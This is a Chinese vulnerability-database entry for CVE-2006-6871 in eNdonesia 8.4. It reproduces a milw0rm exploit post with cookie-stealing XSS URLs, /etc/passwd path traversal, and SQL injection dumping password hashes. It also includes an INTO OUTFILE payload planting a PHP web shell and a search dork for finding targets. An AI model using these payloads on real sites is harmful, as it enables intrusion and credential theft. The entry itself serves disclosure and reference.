Endonesia 多个跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111865 漏洞类型 跨站脚本
发布时间 2006-12-25 更新时间 2007-01-08
CVE编号 CVE-2006-6871 CNNVD-ID CNNVD-200612-646
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/3004
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-646
|漏洞详情
eNdonesia8.4存在多个跨站脚本攻击(XSS)漏洞,远程攻击者可以通过(1)在mod.php中的viewlink操作中的mod参数,(2)在mod.php内的informasi模块中的showinfo操作中的intypeid参数,(3)在friend.php内的"您的朋友"字段,或者(4)在admin.php内的"主文本"字段,注入任意Web脚本或HTML。
|漏洞EXP
bugs for Endonesia8.4 
FInd:z1ckX(ru)
mail:map-master@mail.ru
1) http://localhost/en/mod.php?mod=[XSS]&op=viewlink&cid=5
2) http://localhost/en/friend.php your Friend:[XSS]
3) http://localhost/en/admin.php Main Text: [XSS]
4) http://localhost/en/mod.php?mod=informasi&op=showinfo&intypeid= ><script>document.write(document.cookie)</script>
5) http://localhost/en/mod.php?mod=../../../../../etc/passwd%00
6) http://localhost/en/mod.php?mod=diskusi&op=viewdisk&did=-4%20union%20select%200,0,name,0,pwd,0,0%20from%20authors/* - LOGIN AND PASS (MD5)
7) http://localhost/en/mod.php?mod=katalog&op=viewlink&cid=-2%20union%20select%200,pwd,0%20from%20authors%20where%20counter=1/*
8) http://localhost/en/mod.php?mod=diskusi&op=viewcat&cid=-2%20union%20select%200,0,0/*

-=====SHELL====-
http://localhost/en/mod.php?mod=diskusi&op=viewdisk&did=-4 %20union%20select%200,0,'<? system($cmd)?>',0,0,0,0%20from%20authors into outfile '/home/localhost/www/en/cmd.php'/*

-======dork=====-
inurl:mod.php?mod=diskusi&op=   

# milw0rm.com [2006-12-25]
|参考资料

来源:BID
名称:21333
链接:http://www.securityfocus.com/bid/21333
来源:MILW0RM
名称:3004
链接:http://www.milw0rm.com/exploits/3004
来源:VUPEN
名称:ADV-2006-5187
链接:http://www.frsirt.com/english/advisories/2006/5187
来源:SECUNIA
名称:23502
链接:http://secunia.com/advisories/23502
来源:XF
名称:endonesia-modphp-xss(31116)
链接:http://xforce.iss.net/xforce/xfdb/31116
来源:MILW0RM
名称:3004
链接:http://milw0rm.com/exploits/3004